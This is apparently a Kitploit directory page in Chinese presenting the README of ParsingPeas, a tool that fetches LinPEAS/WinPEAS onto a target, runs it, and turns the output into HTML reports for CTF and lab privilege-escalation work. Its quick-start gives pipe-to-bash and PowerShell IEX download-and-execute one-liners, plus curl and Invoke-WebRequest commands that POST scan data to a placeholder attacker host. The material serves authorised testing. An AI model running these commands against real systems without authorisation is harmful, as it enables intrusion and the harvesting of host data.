Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ParsingPeas — 用于PEAS输出的HTML解析器,具有附加功能 | Kitploit
工具/GitHubGitHub/yuvalmil/parsingpeas
权限提升脚本与自动化信息收集后渗透利用CTF渗透测试实用工具与框架学习与教育实验室与实践
GitHubyuvalmil/parsingpeas

ParsingPeas

用于PEAS输出的HTML解析器,具有附加功能

查看仓库
159141个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ParsingPeas 🥒

自动化收集 PEASS + 生成干净、可移植的 HTML 报告,适用于 CTF 和实验室权限提升工作。

License: MIT Python 3.8+

在目标上运行 一条命令。ParsingPeas 从您的 Kali 主机拉取 LinPEAS/WinPEAS,运行扫描,将输出传回,并将其转换为单个自包含 HTML 报告——您可以阅读、搜索、分类和保存——无需手动传输文件,目标无需互联网。


截图

报告摘要 — 按 LinPEAS 自身类别分组的章节,带有标记点和一个发现条:

Report summary

仅显示发现 — 点击一次即可将报告和侧边栏过滤到包含关键/高风险的章节:

Findings only

完整终端输出 — 完整、忠实保留颜色的扫描结果;可使用 Ctrl-F 搜索:

Full terminal output


为什么使用它

原始的 PEASS 输出是一面滚动的终端文本墙,一旦 shell 关闭就会消失。ParsingPeas:

  • 自动化繁琐工作 — 无需 scp,无需自行托管 linpeas,无需将输出复制粘贴回 Kali。
  • 保存输出 — 每次扫描都会在主机上生成一个带时间戳的 HTML 报告。
  • 使其可导航 — 输出被分割成 LinPEAS 的实际章节,带有分类侧边栏、发现高亮和全文搜索。
  • 便于携带 — 每个报告都是一个自包含的 .html 文件,可以复制到其他地方、存档或通过双击离线打开。

它是 呈现 + 后勤,不是利用引擎:它忠实地保留了 PEASS 自身的颜色和发现,而不是二次猜测它们。


功能

  • 一键式工作流 — 目标从您的主机下载包装器,运行 PEASS,并自动将结果 POST 回来。
  • 目标离线工作 — 一切从您的 Kali 主机提供。
  • 忠实的章节解析 — 遵循 LinPEAS 真实的两级标题层级(主要章节 + 子检查);hacktricks 链接和检查行作为内容保留,不会污染目录。
  • 自包含报告 — 终端输出内嵌在文件中;一个文件,无附加文件,可通过 file:// 打开。
  • 交互式报告视图:
    • 侧边栏目录按 PEASS 自身章节分组,并显示关键/高风险计数。
    • 发现条 — N 个关键 / N 个高风险 标签,可跳转到标记的章节,外加颜色图例。
    • 仅显示发现 过滤器,用于快速分类。
    • 换行 切换(默认开启 — 不再有截断的行)。
    • 滚动监听 — 滚动时当前章节在目录中高亮。
    • 固定章节标题 和“标记为已读”点,这些点会持久保存(通过 localStorage,每个报告独立)。
    • 头部徽章 显示当前用户(root 为红色)和操作系统。
  • 完整终端输出标签页 — 完整的、全彩扫描结果,一次渲染完毕,浏览器的 Ctrl-F 可以搜索全部内容。
  • 柔和的深色主题 — 长时间使用时护眼。
  • Linux 和 Windows — LinPEAS(bash)和 WinPEAS(PowerShell)。

快速开始

在您的 Kali 主机上

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # 下载 LinPEAS + WinPEAS 到 scripts/
pip3 install -r requirements.txt
python3 receiver.py             # 在 http://0.0.0.0:8005 上提供服务

保持 receiver.py 运行。找到目标可以访问您的 IP:

  • HTB / VPN: 您的 tun0 地址 — ip -4 addr show tun0
  • 局域网: 您的常规接口 IP

在目标上

Linux/Unix(使用 curl,失败时回退到 wget):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows(PowerShell / 反向 shell):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

选择与目标操作系统对应的一行命令 — Linux 提供 LinPEAS,Windows 提供 WinPEAS。

查看报告

报告在您的 Kali 主机上生成于 ./reports/ 目录中。您可以:

  • 浏览 http://YOUR_KALI_IP:8005 上的索引并点击一个报告,或者
  • 直接打开生成的文件 — 它是自包含的:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

将该单个 .html 文件复制到任何地方;它独立工作。


工作原理

root@kitploit:~
目标 → 从 Kali 下载包装器 → 运行 PEASS → POST 输出 → Kali 解析 → 自包含 HTML 报告

目标永远不需要互联网 — 包装器和 PEASS 二进制文件都从您的主机提供。


使用报告

  • 报告摘要 标签页 — 侧边栏中按 PEASS 类别分组的章节。红色/黄色点标记包含关键/高风险的章节。使用发现标签直接跳转到它们,或使用仅显示发现隐藏其他所有内容。
  • 完整终端输出 标签页 — 完整的彩色扫描。只需按 Ctrl-F 搜索;整个输出都已渲染,因此原生查找功能可以覆盖所有内容。
  • 点击一个发现点可以将章节标记为已读 — 重新打开报告时它会保持已读状态。

手动使用

如果一行命令失败,可以手动操作。

Linux:

root@kitploit:~
# 在目标上
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# 发回
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows(PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

解析您已有的 PEASS 输出:

root@kitploit:~
python3 parser.py /path/to/peas_output.txt   # 将 HTML 报告写入 ./reports/

配置

编辑 receiver.py 的顶部:


故障排除

  • 无法下载脚本? 运行 curl http://KALI_IP:8005/health 检查连接;使用 sudo ufw allow 8005/tcp 开放防火墙。
  • /get-linpeas 返回 404? 运行 ./setup.sh 以获取 PEAS 二进制文件。
  • PowerShell 反向 shell 中没有实时输出? 这是预期行为 — 扫描仍在运行;在您的接收器上查看上传确认信息。

安全性

⚠️ 仅用于授权渗透测试、CTF 和实验室环境。

  • 无认证 — 仅在隔离的 CTF 网络或防火墙后运行。
  • 上传头部值经过清理,上传有大小限制,但服务器未针对暴露在敌对互联网环境下进行加固。

致谢

基于 PEASS-ng 构建,原作者 @carlospolop。ParsingPeas 仅收集并呈现其输出。


MIT 许可证 · 欢迎贡献

下载工具
设置项默认值备注
端口8005修改 app.run(... port=...) 行
OUTPUT_DIR./received_outputs原始上传的扫描文件
REPORTS_DIR./reports生成的 HTML 报告
SCRIPTS_DIR./scriptsLinPEAS/WinPEAS 二进制文件
MAX_UPLOAD_SIZE10 MB强制执行 — 大于此的上传会收到 HTTP 413